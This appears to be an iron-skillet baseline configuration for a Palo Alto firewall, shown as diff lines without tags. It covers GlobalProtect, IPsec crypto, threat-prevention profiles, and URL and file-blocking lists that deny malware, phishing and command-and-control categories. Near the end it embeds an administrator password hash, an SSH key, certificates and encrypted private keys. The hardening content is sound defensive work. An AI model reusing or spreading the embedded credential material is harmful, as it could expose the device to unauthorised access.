+ group19
+
+ 1
+
+
+
+
+
+ aes-256-gcm
+
+
+ none
+
+
+ group20
+
+ 1
+
+
+
+
+
+
+ aes-128-cbc
+
+
+ sha1
+
+
+
+
+
+
+
+
+
+
+ real-time
+
+
+ high
+
+
+ high
+
+
+ medium
+
+
+ medium
+
+
+ low
+
+
+ low
+
+
+ low
+
+
+
+
+
+
+
+
+
+ no
+
+
+ 1.25
+ 0.5
+ 900
+ 300
+ 900
+ yes
+
+
+
+
+ yes
+
+
+
+
+ no
+
+
+ no
+
+
+ no
+
+
+
+ ethernet1/1
+
+
+
+
+
+
+
+
+
+
+ no
+
+
+ 1.25
+ 0.5
+ 900
+ 300
+ 900
+ yes
+
+
+
+
+
+
+
+
+
+
+
+
+
+ ethernet1/1
+
+
+
+
+
+
+
+ ethernet1/1
+ vlan
+ loopback
+ tunnel
+
+
+
+ gp-default
+
+
+
+
+
+
+
+
+
+
+ no
+ Any
+ local
+ Enter login credentials
+ Username
+ Password
+
+
+ portal-ssl-tls
+
+ ipv4
+ ethernet1/1
+
+
+ factory-default
+ factory-default
+
+
+
+
+
+
+
+
+
+
+ 20
+ yes
+
+
+
+
+
+
+ 52.200.14.80
+
+
+
+ 1
+
+
+ no
+
+
+ 5
+
+
+
+ no
+
+
+ any
+
+
+ any
+
+
+ 0
+ 0
+
+
+
+
+
+ user-logon
+
+
+
+
+ 24
+
+
+
+
+ allowed
+
+
+
+
+ prompt
+
+
+
+
+ yes
+
+
+
+
+ yes
+
+
+
+
+ yes
+
+
+
+
+ 30
+
+
+
+
+ 5
+
+
+
+
+ no
+
+
+
+
+ 0
+
+
+
+
+ 15
+
+
+
+
+ yes
+
+
+
+
+ <div style="font-family:'Helvetica Neue';"><h1 style="color:red;text-align:center; margin: 0; font-size: 30px;">Notice</h1><p style="margin: 0;font-size: 15px; line-height: 1.2em;">To access the network, you must first connect to GlobalProtect.</p></div>
+
+
+
+
+ yes
+
+
+
+
+ no
+
+
+
+
+ <div style="font-family:'Helvetica Neue';"><h1 style="color:red;text-align:center; margin: 0; font-size: 30px;">Captive Portal Detected</h1><p style="margin: 0; font-size: 15px; line-height: 1.2em;">GlobalProtect has temporarily permitted network access for you to connect to the Internet. Follow instructions from your internet provider.</p><p style="margin: 0; font-size: 15px; line-height: 1.2em;">If you let the connection time out, open GlobalProtect and click Connect to try again.</p></div>
+
+
+
+
+ user-and-machine
+
+
+
+
+ 7
+
+
+
+
+ yes
+
+
+
+
+ yes
+
+
+
+
+ yes
+
+
+
+
+ yes
+
+
+
+
+ yes
+
+
+
+
+ yes
+
+
+
+
+ yes
+
+
+
+
+ yes
+
+
+
+
+ 0
+
+
+
+
+ -1
+
+
+
+
+ no
+
+
+
+
+ 0
+
+
+
+
+ 5
+
+
+
+
+ 5
+
+
+
+
+ 30
+
+
+
+
+ yes
+
+
+
+
+ no
+
+
+
+
+ no
+
+
+
+
+ yes
+
+
+
+
+ yes
+
+
+
+
+ no
+
+
+
+
+ 4501
+
+
+
+
+ You have attempted to access a protected resource that requires additional authentication. Proceed to authenticate at
+
+
+
+
+ yes
+
+
+
+
+ no
+
+
+
+
+ 1
+ no
+ no
+ no
+ no
+ 443
+
+
+ -AQ==9EIXqBFzhp4IZxdTxSVTZG/12Vs=iH76LFLerpHJ1S680bBopQ==
+
+
+ no
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Block outbound sessions that match a malicious domain and have been redirected to a configured sinkhole IP address.
+
+ any
+
+
+ any
+
+
+
+ Sinkhole-IPv4
+ Sinkhole-IPv6
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ any
+
+ deny
+ default
+
+ Outbound
+
+ Outbound
+
+
+
+
+
+
+ allow
+ no
+ yes
+
+
+ Inbound
+
+
+ default
+
+
+ drop
+ no
+ yes
+ default
+
+
+
+
+
+
+
+
+
+
+ any
+
+
+ any
+
+
+
+
+
+ any
+
+
+ any
+
+
+
+ any
+
+
+ any
+
+ Recommended_Decryption_Profile
+ no-decrypt
+ This rule does not do Decryption. This rule is validating SSL Protocol Communications.
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 72.5.65.111
+
+
+ 2600:5200::1
+
+
+
+
+
+
+
+
+
+
+ Outbound-AV
+
+
+ Outbound-AS
+
+
+ Outbound-VP
+
+
+ Outbound-URL
+
+
+ Outbound-FB
+
+
+ Outbound-WF
+
+
+
+
+ Inbound-AV
+
+
+ Inbound-AS
+
+
+ Inbound-VP
+
+
+ Inbound-FB
+
+
+ Inbound-WF
+
+
+
+
+ Internal-AV
+
+
+ Internal-AS
+
+
+ Internal-VP
+
+
+ Internal-FB
+
+
+ Internal-WF
+
+
+
+
+ Alert-Only-AV
+
+
+ Alert-Only-AS
+
+
+ Alert-Only-VP
+
+
+ Alert-Only-URL
+
+
+ Alert-Only-FB
+
+
+ Alert-Only-WF
+
+
+
+
+ Outbound-AV
+
+
+ Outbound-AS
+
+
+ Outbound-VP
+
+
+ Outbound-URL
+
+
+ Outbound-FB
+
+
+ Outbound-WF
+
+
+
+
+
+
+ color3
+
+
+ color24
+
+
+ color20
+
+
+ color13
+
+
+ Outbound to the Internet
+
+
+ Inbound from the Internet
+
+
+ Internal to Internal
+
+
+ version 1.0.6: version of this iron-skillet template file
+
+
+
+
+
+
+
+
+
+
+
+
+ alert
+ alert
+
+
+ alert
+ alert
+
+
+ alert
+ alert
+
+
+ alert
+ alert
+
+
+ alert
+ alert
+
+
+ alert
+ alert
+
+
+
+
+
+
+ reset-both
+ reset-both
+
+
+ reset-both
+ reset-both
+
+
+ reset-both
+ reset-both
+
+
+ reset-both
+ reset-both
+
+
+ reset-both
+ reset-both
+
+
+ reset-both
+ reset-both
+
+
+
+
+
+
+ reset-both
+ reset-both
+
+
+ reset-both
+ reset-both
+
+
+ reset-both
+ reset-both
+
+
+ reset-both
+ reset-both
+
+
+ reset-both
+ reset-both
+
+
+ reset-both
+ reset-both
+
+
+
+
+
+
+ reset-both
+ reset-both
+
+
+ reset-both
+ reset-both
+
+
+ reset-both
+ reset-both
+
+
+ reset-both
+ reset-both
+
+
+ reset-both
+ reset-both
+
+
+ reset-both
+ reset-both
+
+
+
+
+
+
+ reset-both
+ reset-both
+
+
+ reset-both
+ reset-both
+
+
+ reset-both
+ reset-both
+
+
+ reset-both
+ reset-both
+
+
+ reset-both
+ reset-both
+
+
+ reset-both
+ reset-both
+
+
+ Use this profile for rules needing modifications to the standard
+
+
+
+
+
+
+
+
+
+
+ single-packet
+
+
+
+ 72.5.65.111
+ 2600:5200::1
+
+
+
+
+
+
+
+
+ high
+ critical
+ medium
+
+ any
+ any
+ single-packet
+
+
+
+
+
+
+ low
+ informational
+
+ any
+ any
+ disable
+
+
+
+
+
+
+
+
+
+
+ single-packet
+
+
+
+ 72.5.65.111
+ 2600:5200::1
+
+
+
+
+
+
+
+
+ high
+ critical
+ medium
+
+ any
+ any
+ single-packet
+
+
+
+
+
+
+ low
+ informational
+
+ any
+ any
+ disable
+
+
+
+
+
+
+
+
+
+
+ single-packet
+
+
+
+ 72.5.65.111
+ 2600:5200::1
+
+
+
+
+
+
+
+
+ high
+ critical
+
+ any
+ any
+ single-packet
+
+
+
+
+
+
+ low
+ informational
+ medium
+
+ any
+ any
+ disable
+
+
+
+
+
+
+
+
+
+
+ disable
+
+
+
+ 72.5.65.111
+ 2600:5200::1
+
+
+
+
+
+
+
+
+ any
+
+ any
+ any
+ disable
+
+
+
+
+
+
+
+
+
+
+ single-packet
+
+
+
+ 72.5.65.111
+ 2600:5200::1
+
+
+
+
+
+
+
+
+
+ any
+
+
+ any
+
+
+ critical
+
+ any
+ client
+ any
+ disable
+
+
+
+
+
+
+ any
+
+
+ any
+
+
+ high
+
+ any
+ client
+ any
+ disable
+
+
+
+
+
+
+ any
+
+
+ any
+
+
+ medium
+
+ any
+ client
+ any
+ disable
+
+
+
+
+
+
+ any
+
+
+ any
+
+
+ critical
+
+ any
+ server
+ any
+ disable
+
+
+
+
+
+
+ any
+
+
+ any
+
+
+ high
+
+ any
+ server
+ any
+ disable
+
+
+
+
+
+
+ any
+
+
+ any
+
+
+ medium
+
+ any
+ server
+ any
+ disable
+
+
+
+
+
+
+
+
+
+
+
+
+ WW's profile
+
+
+
+
+
+
+
+
+ any
+
+
+ critical
+ high
+ medium
+
+
+ any
+
+ any
+ any
+ any
+ single-packet
+
+
+
+
+
+
+ any
+
+
+ low
+ informational
+
+
+ any
+
+ any
+ any
+ any
+ disable
+
+
+
+
+
+
+
+
+
+
+ any
+
+
+ critical
+ high
+ medium
+
+
+ any
+
+ any
+ any
+ any
+ single-packet
+
+
+
+
+
+
+ any
+
+
+ low
+ informational
+
+
+ any
+
+ any
+ any
+ any
+ disable
+
+
+
+
+
+
+
+
+
+
+ any
+
+
+ critical
+ high
+
+
+ any
+
+ any
+ any
+ any
+ single-packet
+
+
+
+
+
+
+ any
+
+
+ low
+ informational
+ medium
+
+
+ any
+
+ any
+ any
+ any
+ disable
+
+
+
+
+
+
+
+
+
+
+ any
+
+
+ any
+
+
+ any
+
+ any
+ any
+ any
+ disable
+
+
+
+
+
+
+
+
+
+
+
+ high
+
+ abortion
+ abused-drugs
+ adult
+ alcohol-and-tobacco
+ auctions
+ business-and-economy
+ command-and-control
+ computer-and-internet-info
+ content-delivery-networks
+ copyright-infringement
+ dating
+ dynamic-dns
+ educational-institutions
+ entertainment-and-arts
+ extremism
+ financial-services
+ gambling
+ games
+ government
+ hacking
+ health-and-medicine
+ home-and-garden
+ hunting-and-fishing
+ insufficient-content
+ internet-communications-and-telephony
+ internet-portals
+ job-search
+ legal
+ malware
+ military
+ motor-vehicles
+ music
+ news
+ not-resolved
+ nudity
+ online-storage-and-backup
+ parked
+ peer-to-peer
+ personal-sites-and-blogs
+ philosophy-and-political-advocacy
+ phishing
+ private-ip-addresses
+ proxy-avoidance-and-anonymizers
+ questionable
+ real-estate
+ recreation-and-hobbies
+ reference-and-research
+ religion
+ search-engines
+ sex-education
+ shareware-and-freeware
+ shopping
+ social-networking
+ society
+ sports
+ stock-advice-and-tools
+ streaming-media
+ swimsuits-and-intimate-apparel
+ training-and-tools
+ translation
+ travel
+ unknown
+ weapons
+ web-advertisements
+ web-based-email
+ web-hosting
+ Black-List
+ White-List
+
+
+ yes
+ yes
+ yes
+
+ abortion
+ abused-drugs
+ adult
+ alcohol-and-tobacco
+ auctions
+ business-and-economy
+ computer-and-internet-info
+ content-delivery-networks
+ copyright-infringement
+ dating
+ dynamic-dns
+ educational-institutions
+ entertainment-and-arts
+ extremism
+ financial-services
+ gambling
+ games
+ government
+ health-and-medicine
+ home-and-garden
+ hunting-and-fishing
+ insufficient-content
+ internet-communications-and-telephony
+ internet-portals
+ job-search
+ legal
+ military
+ motor-vehicles
+ music
+ news
+ not-resolved
+ nudity
+ online-storage-and-backup
+ parked
+ peer-to-peer
+ personal-sites-and-blogs
+ philosophy-and-political-advocacy
+ private-ip-addresses
+ proxy-avoidance-and-anonymizers
+ questionable
+ real-estate
+ recreation-and-hobbies
+ reference-and-research
+ religion
+ search-engines
+ sex-education
+ shareware-and-freeware
+ shopping
+ social-networking
+ society
+ sports
+ stock-advice-and-tools
+ streaming-media
+ swimsuits-and-intimate-apparel
+ training-and-tools
+ translation
+ travel
+ unknown
+ weapons
+ web-advertisements
+ web-based-email
+ web-hosting
+ White-List
+
+
+ command-and-control
+ hacking
+ malware
+ phishing
+ Black-List
+
+
+
+
+
+
+
+ medium
+
+ abortion
+ abused-drugs
+ adult
+ alcohol-and-tobacco
+ auctions
+ business-and-economy
+ command-and-control
+ computer-and-internet-info
+ content-delivery-networks
+ copyright-infringement
+ dating
+ dynamic-dns
+ educational-institutions
+ entertainment-and-arts
+ extremism
+ financial-services
+ gambling
+ games
+ government
+ hacking
+ health-and-medicine
+ home-and-garden
+ hunting-and-fishing
+ insufficient-content
+ internet-communications-and-telephony
+ internet-portals
+ job-search
+ legal
+ malware
+ military
+ motor-vehicles
+ music
+ news
+ not-resolved
+ nudity
+ online-storage-and-backup
+ parked
+ peer-to-peer
+ personal-sites-and-blogs
+ philosophy-and-political-advocacy
+ phishing
+ private-ip-addresses
+ proxy-avoidance-and-anonymizers
+ questionable
+ real-estate
+ recreation-and-hobbies
+ reference-and-research
+ religion
+ search-engines
+ sex-education
+ shareware-and-freeware
+ shopping
+ social-networking
+ society
+ sports
+ stock-advice-and-tools
+ streaming-media
+ swimsuits-and-intimate-apparel
+ training-and-tools
+ translation
+ travel
+ unknown
+ weapons
+ web-advertisements
+ web-based-email
+ web-hosting
+ Black-List
+ White-List
+
+
+
+ abortion
+ abused-drugs
+ adult
+ alcohol-and-tobacco
+ auctions
+ business-and-economy
+ command-and-control
+ computer-and-internet-info
+ content-delivery-networks
+ copyright-infringement
+ dating
+ dynamic-dns
+ educational-institutions
+ entertainment-and-arts
+ extremism
+ financial-services
+ gambling
+ games
+ government
+ hacking
+ health-and-medicine
+ home-and-garden
+ hunting-and-fishing
+ insufficient-content
+ internet-communications-and-telephony
+ internet-portals
+ job-search
+ legal
+ malware
+ military
+ motor-vehicles
+ music
+ news
+ not-resolved
+ nudity
+ online-storage-and-backup
+ parked
+ peer-to-peer
+ personal-sites-and-blogs
+ philosophy-and-political-advocacy
+ phishing
+ private-ip-addresses
+ proxy-avoidance-and-anonymizers
+ questionable
+ real-estate
+ recreation-and-hobbies
+ reference-and-research
+ religion
+ search-engines
+ sex-education
+ shareware-and-freeware
+ shopping
+ social-networking
+ society
+ sports
+ stock-advice-and-tools
+ streaming-media
+ swimsuits-and-intimate-apparel
+ training-and-tools
+ translation
+ travel
+ unknown
+ weapons
+ web-advertisements
+ web-based-email
+ web-hosting
+ Black-List
+ White-List
+
+
+
+
+
+
+
+ high
+
+ abortion
+ abused-drugs
+ adult
+ alcohol-and-tobacco
+ auctions
+ business-and-economy
+ command-and-control
+ computer-and-internet-info
+ content-delivery-networks
+ copyright-infringement
+ dating
+ dynamic-dns
+ educational-institutions
+ entertainment-and-arts
+ extremism
+ financial-services
+ gambling
+ games
+ government
+ hacking
+ health-and-medicine
+ home-and-garden
+ hunting-and-fishing
+ insufficient-content
+ internet-communications-and-telephony
+ internet-portals
+ job-search
+ legal
+ malware
+ military
+ motor-vehicles
+ music
+ news
+ not-resolved
+ nudity
+ online-storage-and-backup
+ parked
+ peer-to-peer
+ personal-sites-and-blogs
+ philosophy-and-political-advocacy
+ phishing
+ private-ip-addresses
+ proxy-avoidance-and-anonymizers
+ questionable
+ real-estate
+ recreation-and-hobbies
+ reference-and-research
+ religion
+ search-engines
+ sex-education
+ shareware-and-freeware
+ shopping
+ social-networking
+ society
+ sports
+ stock-advice-and-tools
+ streaming-media
+ swimsuits-and-intimate-apparel
+ training-and-tools
+ translation
+ travel
+ unknown
+ weapons
+ web-advertisements
+ web-based-email
+ web-hosting
+ Black-List
+ White-List
+
+
+ yes
+ yes
+ yes
+
+ abortion
+ abused-drugs
+ adult
+ alcohol-and-tobacco
+ auctions
+ business-and-economy
+ computer-and-internet-info
+ content-delivery-networks
+ copyright-infringement
+ dating
+ dynamic-dns
+ educational-institutions
+ entertainment-and-arts
+ extremism
+ financial-services
+ gambling
+ games
+ government
+ health-and-medicine
+ home-and-garden
+ hunting-and-fishing
+ insufficient-content
+ internet-communications-and-telephony
+ internet-portals
+ job-search
+ legal
+ military
+ motor-vehicles
+ music
+ news
+ not-resolved
+ nudity
+ online-storage-and-backup
+ parked
+ peer-to-peer
+ personal-sites-and-blogs
+ philosophy-and-political-advocacy
+ private-ip-addresses
+ proxy-avoidance-and-anonymizers
+ questionable
+ real-estate
+ recreation-and-hobbies
+ reference-and-research
+ religion
+ search-engines
+ sex-education
+ shareware-and-freeware
+ shopping
+ social-networking
+ society
+ sports
+ stock-advice-and-tools
+ streaming-media
+ swimsuits-and-intimate-apparel
+ training-and-tools
+ translation
+ travel
+ unknown
+ weapons
+ web-advertisements
+ web-based-email
+ web-hosting
+ White-List
+
+
+ command-and-control
+ hacking
+ malware
+ phishing
+ Black-List
+
+
+
+
+
+ URL List
+
+
+ URL List
+
+
+ URL List
+
+
+
+
+
+
+
+ any
+
+
+ any
+
+ both
+ alert
+
+
+
+ any
+
+
+ 7z
+ bat
+ chm
+ class
+ cpl
+ dll
+ hlp
+ hta
+ jar
+ ocx
+ pif
+ scr
+ torrent
+ vbe
+ wsf
+
+ both
+ block
+
+
+
+
+
+
+
+ any
+
+
+ any
+
+ both
+ alert
+
+
+
+ any
+
+
+ 7z
+ bat
+ chm
+ class
+ cpl
+ dll
+ hlp
+ hta
+ jar
+ ocx
+ pif
+ scr
+ torrent
+ vbe
+ wsf
+
+ both
+ block
+
+
+
+
+
+
+
+ any
+
+
+ any
+
+ both
+ alert
+
+
+
+ any
+
+
+ 7z
+ bat
+ chm
+ class
+ cpl
+ hlp
+ hta
+ jar
+ ocx
+ pif
+ scr
+ torrent
+ vbe
+ wsf
+
+ both
+ block
+
+
+
+
+
+
+
+ any
+
+
+ any
+
+ both
+ alert
+
+
+
+
+
+
+
+
+
+
+
+
+ yes
+ yes
+ yes
+ yes
+ yes
+ yes
+
+
+ yes
+ yes
+
+
+ no
+ no
+
+
+ yes
+ yes
+
+
+ tls1-2
+ no
+ no
+ no
+ no
+
+
+
+
+
+
+
+
+ any
+
+
+ any
+
+ both
+ public-cloud
+
+
+
+
+
+
+
+ any
+
+
+ any
+
+ both
+ public-cloud
+
+
+
+
+
+
+
+ any
+
+
+ any
+
+ both
+ public-cloud
+
+
+
+
+
+
+
+ any
+
+
+ any
+
+ both
+ public-cloud
+
+
+
+
+
+
+
+
+
+
+
+
+
+ $1$cymvlwsn$RRpD0YIgly7MQi2OwhBhV0
+
+
+ yes
+
+
+ c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFERmRyZmRqUUFSL2NnelVSRTYwLzFKbHFoWXEra3FIeGNxMlpOTTR5VkRobVZ3K2dnUXBxTWQwdG8yRmRZeXV4bUhHdVF4bGFMQkp4UDBtcW5LU3A2eUhqZ2orMTRHK29oYVpKbW5Bd3A2YXVkbXVHVkVEMnliVmZvcGc2dlh3WVdIaFdsSlk3N25ESStxQ1U1blRlMjlZNlpvU29PYmJZWkFqZjY5TXRBUzF2blEwZHduUzk2MEo4ZGdoWjMxK2Z5bTFWdDB5WFlmZ0JPYU4yK0JiK0dRa1dreEQ3UHErUEVYd3EvdysyajZ3d3ZmbEVGQVVkNXNMejh2TzBVMDBEYVZiVFVvMkFoR1VRZndlNVJsTDNTQzdzaTRQdDdYMWVsK2swTW54ZzMyUkt6UFM0ZHd6emYxRklJR2VhYVNnbVFNMGRuQ0hxYjNnMzdzWWpybWFVSGo=
+
+
+
+ yes
+ 8
+
+
+
+
+
+ e8d8421e
+ e8d8421e
+ Mar 25 14:04:21 2020 GMT
+ /CN=GP-CA
+ Mar 25 14:04:21 2021 GMT
+ GP-CA
+ 1616681061
+ yes
+ /CN=GP-CA
+ -----BEGIN CERTIFICATE-----
+MIICwDCCAaigAwIBAgIJANrYfmxATInkMA0GCSqGSIb3DQEBCwUAMBAxDjAMBgNV
+BAMTBUdQLUNBMB4XDTIwMDMyNTE0MDQyMVoXDTIxMDMyNTE0MDQyMVowEDEOMAwG
+A1UEAxMFR1AtQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCsRu/s
+uKqCjcZ72Yw5vN7HOQ8VoRZdafB8FAPNS5+Az+9KBNlKRAIT9K342JDZis4loQ3T
+iN6rw8h2tN3vQH987q31bSTUT3ztd82gl/EzRexRNcGwQzm4VgtbzmTm2qnqqIps
+DueALRDu0SZZX++EWufWxko5wiz+rk0ie3KgGYXJlFzf70Hwnf5P6/fWOIHutk9b
+5n4CP1JMdP5ihF8EmRxwqTDzUpBU+MKU+QkpGkIh4dADvDiPEi55N9sRWkqxqOP5
+E78OxxUKGZua1eItevFjU45fQRKc2tyavVIhQjy/Z044rqJF60mt+r0v6er7i3o6
+KluBdl7P9dLeGdahAgMBAAGjHTAbMAwGA1UdEwQFMAMBAf8wCwYDVR0PBAQDAgIE
+MA0GCSqGSIb3DQEBCwUAA4IBAQBH5ANVFfZjJNCT+/448Ic3xCj5R5PepeATU45m
++nGNhjVpE4615A4gnKbBdY0m/LDLJX0tmlmGLPNxJzIyW65gz0i9fXtNydp3Bw6c
+j9HD78IJST3o8wxREMzii+qhHyyv7Z3rjVYl2ZCQleWJ/Sl1u4Fui1pv1TSJ9g76
+nlWZYAvojlohXKZ+w8ApPantfAYtbh2cxfeml5abP7SfRDOWJxnNH/t/4fkwbh2t
+TiKlWPCWC97tIqhu8tGZAVcW10pi3OJxT7FQ3n85p3xC59SgkN7O4W2Z/v9JnYan
+QvnpOZcbAGndlh45yV1ePK+NiAgRPRYfL7M18pPXXaWdfr1L
+-----END CERTIFICATE-----
+
+ RSA
+ -AQ==cCMHUK/S6nkVFYzdgY+hCSo7iGU=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
+
+
+ a505da21
+ e8d8421e
+ Mar 25 14:04:43 2020 GMT
+ /CN=GP-CA
+ Mar 25 14:04:43 2021 GMT
+ dummy-portal-cert
+ 1616681083
+ no
+ /CN=dummy-portal-cert
+ -----BEGIN CERTIFICATE-----
+MIIDFzCCAf+gAwIBAgIEa51q2zANBgkqhkiG9w0BAQsFADAQMQ4wDAYDVQQDEwVH
+UC1DQTAeFw0yMDAzMjUxNDA0NDNaFw0yMTAzMjUxNDA0NDNaMBwxGjAYBgNVBAMT
+EWR1bW15LXBvcnRhbC1jZXJ0MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKC
+AQEA2lQTCdFX9ipNB5vNvsr1StRKySrYXfAFp2zd4+n6d7SbauoIYgJ4H3TNqMjC
+g0LqWj4ZIueD32DfLRGg1E+I+wlOMjHorT9WWl/s9rHnzWZcLiXB9+//dwOnOb7D
+cmTKAEsyKMKuvAlcLZE/+2o0cBAEMZiOFseAnN//tOOBfw4ps/mdeGVnkdUxcDNw
+qt7zuLewAuoWWYNG89kDK+yl+osk8HwVWb2h1hzX4ru3eA6Eu/Mi7LjVKmjA7rkf
+Uuznxd+WXsXVzOXhZ+zcTjiWganOw68/indTlEnlr4AjDp2fjh0KHvN1RS+9LpG1
+q3/j6nG43rjqTgw4ck+B5oxdywIDAQABo20wazAJBgNVHRMEAjAAMAsGA1UdDwQE
+AwIDuDAnBgNVHSUEIDAeBggrBgEFBQcDAQYIKwYBBQUHAwIGCCsGAQUFBwMFMAkG
+A1UdIwQCMAAwHQYDVR0OBBYEFMWfabSY9YsC5BxBsrW4YO25OhynMA0GCSqGSIb3
+DQEBCwUAA4IBAQARAtUAkncs7l+DEkRXI6eH0h5eQmwV51fNtTL1ZoXgol8RPQXS
+MbfFmNZXlkDvC3cTeSuUABC6XYuK/YtTPR91H+c5JxZpDviPsZCRfPPVdXG3qO9+
+RDXMcCHQszSwiEfSnv031L0RKKhbxYBxhLQH+Rtj98gsRIBNvFDxcwxxesyjwXxd
+Dn94Ai0XjpfRXUN8A3kpLm3w4D8Thly7Rbm48teG7iLTnp8cqIeXLTUoFVOy8q8i
+mF0yAHinKlZowbAFo9u2OABVzRjWDcE9z0fUn8Nv1nrG8ROLlhGb3/S7wZYB6BZl
++wPtFwy/ddXpFb2dtfGk87+tbHiIk5jf2jCY
+-----END CERTIFICATE-----
+
+ RSA
+ -AQ==/DO+X7/5/0zLt2M6gBYgg8Ayu4g=wfL5Zc+wUAak+B7CnAVY6NdutYWtt67XvF+yGHFGS+v3hQ6NGerTNEn2/C/2TE21E8ZdTqNCcC2t/sIGTgT3w7iRoM6ASextU4FETwGpsBCaf/iFRK6KaH5/x7Y8CJ8Na3pj7aXuHh+kIRp/KusjqW391MA/5J62/d8i1G+WM2x0jKZYKF82rd0eavxw/LgO2DHFSjItE95PSJDC86StIFvDENiYysDHnbzqVbGFQASOunybhGBhIOdYNyIgmgG3CrsIf2aOJTwCFFXyE/heOy9YArMyVH+3w7vrG2QajikZWOmiJX6kMBxLBEeAIYNsy/y4KHa1NOLirYVwx0rIr9mKu1J4P59yB2Ml4WPp9ggXjmU5g4cP4CrTOA8d7CWn8drFgsO2gZ66ZZvSbu7RVkDp6d/BeY90fD1pS2tj9GN8HFpFyOjW5hWxi7ytZ4kjvLBbhmkHI7Ijv6Mvm+ZKnbyuTqFI+DOUEjh1zaaajk65ow3N0cDbaHARnEwa0TTLYzwL9PdrAZv/8Ug4FAlvgv2sUNveibG/93T7AMwGN/Wh9qL0nuZd8519BLXKNEi1YIfo9mqbn+c495KS7LVpkltL0Kz0smlKWYX998LZeDqcvqdk8Q643Ey5/lwir2dIXwjYHgBiwwZQTGn2yiYNeOk2yuqTFohPWKuUEXPr3FLnWoy6MpapeURbI3tKdmnqlYrlqy5YgwFrHxnoG7zT1iElofpnmsw5DxbzGmvYopqgHufjmpCYGLhnEw/dxyyAQZCfCwLLD9cKtCCr4hAxDnRTU/UgGyxkBrZvwRszsJpN0cqh80KlODjAjLMOtIhyUPU1JB7ugjoXsyurdoLc8eNCoEXsOYoT5x+vDOlZKknnrQnajQ+GDB5XvGQg1vNCRrzfKlwBapGN422PpsgZZ96FXCzMdHOESFvGvj/zjQv5JKRbV6v/wcw/DhN4wd3x0mi16muw1xS/neJbhrebfZCLeVIdCZoQGOHP1Rz3DozONSyrJi5oWzGbM2ijWDaGPZs/sBIyfI6lF/S4l6pF+O//zwhDVa190qCYpvoJF7r3EYdxFku6qVYGtCbHP0